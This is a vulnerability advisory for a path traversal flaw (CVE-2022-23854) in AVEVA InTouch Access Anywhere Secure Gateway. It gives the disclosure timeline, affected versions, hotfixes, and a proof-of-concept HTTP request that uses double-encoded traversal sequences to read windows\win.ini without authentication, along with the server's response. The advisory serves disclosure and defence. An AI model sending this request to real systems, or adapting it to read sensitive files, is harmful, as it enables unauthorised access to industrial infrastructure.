InTouch Access Anywhere Secure Gateway 2020 R2 Path Traversal Vulnerability

Title:
======
AVEVA InTouch Access Anywhere Secure Gateway - Path Traversal

Author:
=======
Jens Regel, CRISEC IT-Security

CVE:
====
CVE-2022-23854

Advisory:
=========
https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal/

Timeline:
=========
25.06.2021 Vulnerability discovered
25.06.2021 Send details to [email protected]
21.09.2021 Vendor response, fix is available until Q1/2022
25.09.2021 Vendor released Tech Alert TA000022335
06.09.2022 Public disclosure

Vendor:
=======
AVEVA Group plc is a marine and plant engineering IT company 
headquartered in Cambridge, England. AVEVA software is used in many 
sectors, including on- and off-shore oil and gas processing, chemicals, 
pharmaceuticals, nuclear and conventional power generation, nuclear fuel 
reprocessing, recycling and shipbuilding (https://www.aveva.com).

Affected Products:
==================
InTouch Access Anywhere Secure Gateway versions 2020 R2 and older

Details:
========
A security vulnerability exists in InTouch Access Anywhere Secure 
Gateway versions 2020 R2 and older. This is a Relative Path Traversal 
vulnerability which allows an unauthenticated user with network access 
to the Secure Gateway to read files on the system outside of the Secure 
Gateway web server.

Proof of Concept:
=================
GET 
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini 
HTTP/1.1

HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Fix:
====
InTouch Access Anywhere Secure Gateway 2020 R2 (version 20.1.0) Hotfix
InTouch Access Anywhere Secure Gateway 2020b (version 20.0.1) Hotfix